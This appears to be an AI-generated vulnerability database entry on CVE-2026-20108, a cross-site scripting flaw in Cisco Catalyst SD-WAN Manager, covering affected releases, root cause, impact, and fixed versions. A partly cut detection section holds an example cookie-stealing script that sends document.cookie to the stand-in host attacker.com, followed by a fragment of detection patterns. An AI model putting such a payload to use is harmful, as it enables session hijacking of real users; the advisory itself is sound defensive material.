
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-20108 is a stored/reflected cross-site scripting (XSS) vulnerability in the web-based management interface of Cisco Catalyst SD-WAN Manager. It allows an authenticated, remote attacker to conduct XSS attacks against other users of the interface by exploiting insufficient input validation. The vulnerability affects Cisco Catalyst SD-WAN Manager across multiple releases in the 20.12, 20.13, 20.14, 20.15, 20.16, and 20.18 trains; releases 20.11 and earlier are not affected. It was first published on March 25, 2026, and carries a CVSS v3.1 base score of 5.4 (Medium) (Cisco Advisory).
The root cause is improper neutralization of user-supplied input during web page generation (CWE-79), where the SD-WAN Manager interface fails to adequately sanitize or encode attacker-controlled data before rendering it in the browser. Exploitation requires the attacker to be authenticated (low-privilege) and to socially engineer a target user into clicking a crafted link, making this a network-based, low-complexity attack with required user interaction. The vulnerability was discovered during Cisco's internal security testing, and no public proof-of-concept code has been disclosed (Cisco Advisory).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of the victim's browser session within the SD-WAN Manager interface, potentially enabling session token theft, credential harvesting, or unauthorized actions performed on behalf of the victim. The scope is changed (S:C), meaning the injected script can affect resources beyond the attacker's own session. Confidentiality and integrity impacts are both rated Low, with no direct availability impact; however, access to sensitive browser-based information such as session cookies or management credentials could facilitate further compromise of the SD-WAN infrastructure (Cisco Advisory).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>).%3Cscript%3E, javascript:, onerror=, onload=); authentication events from unexpected IP addresses following a potential session hijack.Cisco has released fixed software versions to address this vulnerability; there are no workarounds available. Administrators should upgrade to the following fixed releases based on their current train: 20.12 → 20.12.5.3 or 20.12.6.1; 20.15 → 20.15.4.2 or 20.15.5; 20.18 → 20.18.2.1. Releases 20.13, 20.14, and 20.16 have reached End of Software Maintenance and customers must migrate to a supported fixed release. Cisco strongly recommends restricting management interface access to trusted networks and enforcing multi-factor authentication to reduce the risk of credential compromise that could enable exploitation (Cisco Advisory).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."